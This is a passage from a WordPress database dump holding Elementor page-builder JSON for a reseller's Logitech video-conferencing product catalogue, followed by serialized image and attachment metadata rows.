control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"cd63719\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-bcc950\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"c6bed49\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally-camera\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":20,\"padding\":{\"unit\":\"px\",\"top\":\"45\",\"right\":\"45\",\"bottom\":\"45\",\"left\":\"45\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5792,2986,'_elementor_version','0.4'),(5795,2987,'_edit_lock','1551689531:1'),(5796,2987,'_edit_last','1'),(5797,2987,'_wp_page_template','template-fullwidth.php'),(5798,2987,'_hide_page_title',''),(5799,2987,'_hide_header',''),(5800,2987,'_hide_footer',''),(5801,2987,'_hide_breadcrumb',''),(5802,2987,'_cover',''),(5803,2987,'_show_excerpt',''),(5804,2987,'_wc_apply_product',''),(5805,2987,'_yoast_wpseo_content_score','30'),(5806,2987,'_elementor_edit_mode','builder'),(5807,2987,'_elementor_template_type','post'),(5808,2989,'_wp_attached_file','2019/03/u4.png'),(5809,2989,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.191017730445214084511462715454399585723876953125;s:5:\"bytes\";i:118967;s:11:\"size_before\";i:692030;s:10:\"size_after\";i:573063;s:4:\"time\";d:1.25;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:6522;s:11:\"size_before\";i:27742;s:10:\"size_after\";i:21220;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:9436;s:11:\"size_before\";i:46680;s:10:\"size_after\";i:37244;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:35641;s:11:\"size_before\";i:256885;s:10:\"size_after\";i:221244;s:4:\"time\";d:0.409999999999999975575093458246556110680103302001953125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.280000000000001136868377216160297393798828125;s:5:\"bytes\";i:9613;s:11:\"size_before\";i:43142;s:10:\"size_after\";i:33529;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:25821;s:11:\"size_before\";i:121848;s:10:\"size_after\";i:96027;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:31934;s:11:\"size_before\";i:195733;s:10:\"size_after\";i:163799;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}}}'),(5810,2989,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:600;s:4:\"file\";s:14:\"2019/03/u4.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"u4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"u4-300x180.png\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"u4-768x461.png\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:14:\"u4-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:14:\"u4-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:14:\"u4-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5811,2989,'_elementor_source_image_hash','a999c02c391177d5728a02609c53660477dc8b53'),(5812,2990,'_wp_attached_file','2019/03/briopictograms-1.p